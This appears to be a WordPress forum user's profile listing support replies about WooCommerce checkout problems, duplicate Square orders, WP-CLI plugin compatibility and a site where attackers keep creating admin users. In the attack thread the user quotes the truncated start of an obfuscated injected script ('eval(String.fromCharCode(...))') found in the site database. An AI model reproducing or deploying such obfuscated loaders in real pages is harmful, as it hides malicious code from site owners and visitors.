saruncloudspring
Forum Replies Created
-
Forum: Plugins
In reply to: [WooCommerce] ?wc-ajax=get_refreshed_fragments getting cancelledThe issue is comes when we add product in cart and checkout page
why no response from your side ?
Forum: Fixing WordPress
In reply to: Admin User creating attackI found following code in Db eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116,
bye checking this article
- This reply was modified 6 years, 8 months ago by saruncloudspring.
Forum: Fixing WordPress
In reply to: Admin User creating attack@jnashhawkins they are using different IP’s so we cant block particular range of ip they are using different range of IP.
No i didn’t contacted the WordFence support yet.
We have enabled 2FA by using iTheme pro security plugin. And we have enabled the 2FA by email notification so when admin user tried to login with correct user name password then next step they need to provide the 2FA code generated by iTheme security.
Yes i have contacted the webhost they are also dont know how the user creating on my site.
Forum: Fixing WordPress
In reply to: Admin User creating attack@jnashhawkins When i blocking their IP then they have creating new user using another IP. So IP blocking not providing solution for that.
Also when i checking the email log i can see that 2FA email are sending into their email address.
Yes he is installing new vulnerable plugin on my site and also he checking all pages and site settings on back-end.
Thank you So Much !!
Forum: Fixing WordPress
In reply to: How to check 100% compatible plugin Update By WP CLIThere’s “requires at least” and “tested up to”. what you mean by this ???
Also how we can check plugin compatibility with wordpress with CLI command ?Forum: Fixing WordPress
In reply to: How to check 100% compatible plugin Update By WP CLIAre you actually wordpress developer ?? i cant believe because by checking that screenshot you dont know in wordpress where that 100% compatible is showing ? 100 % compatible is showing on plugin update section on wordpress back-end.
Forum: Fixing WordPress
In reply to: How to check 100% compatible plugin Update By WP CLICompatibility with WordPress 4.9.10: 100% (according to its author) This what i mean. Please check screen shot for more detail https://prnt.sc/ovwawc
Forum: Fixing WordPress
In reply to: How to check 100% compatible plugin Update By WP CLIBy using WP cli command how i can list 100% compatible update available plugin ?
I want to update a post meta value (update_post_meta) when PDF invoice creating. So what hook i need to use for that.I dont know which function you are triggering for created PDF. If know that hook or function you using then i can add code on theme function.php for update post meta.
Forum: Plugins
In reply to: [WooCommerce Square] Duplicate ordersHi, @amandasjackson
Thanks for your reply,
Now we are getting lot of duplicate order on website. so if you can release patch version of plugin of us to solve the issue ? Or if we downgrade the plugin into previous version the issue will solve temporary ?? This was very urgent one for us please replay Asap.
Thank You
Forum: Plugins
In reply to: [WooCommerce Square] Duplicate ordersRegrading the same issue i already contacted the woocommerce support team via chat and they also confirmed that the issue due to with plugin bug. And that bug are already reported with the your plugin developers and also he send internal note also. The woocommerce support person comment is following
This is because WooCommerce core NEVER submits the form. They listen for a submit, intercept, and then always return false. Everything for submitting an order happens in AJAX calls during that intercep, during the checkout processt.
It’s in: if ( $form.triggerHandler( ‘checkout_place_order_’ + wc_checkout_form.get_payment_method() ) { // keep processing checkout }
So the issue with plugin and please resolve the issue ASAP
Thanks,
Very poor Support from Plugin Side
Is there any update for this issue ? why no response from your side ?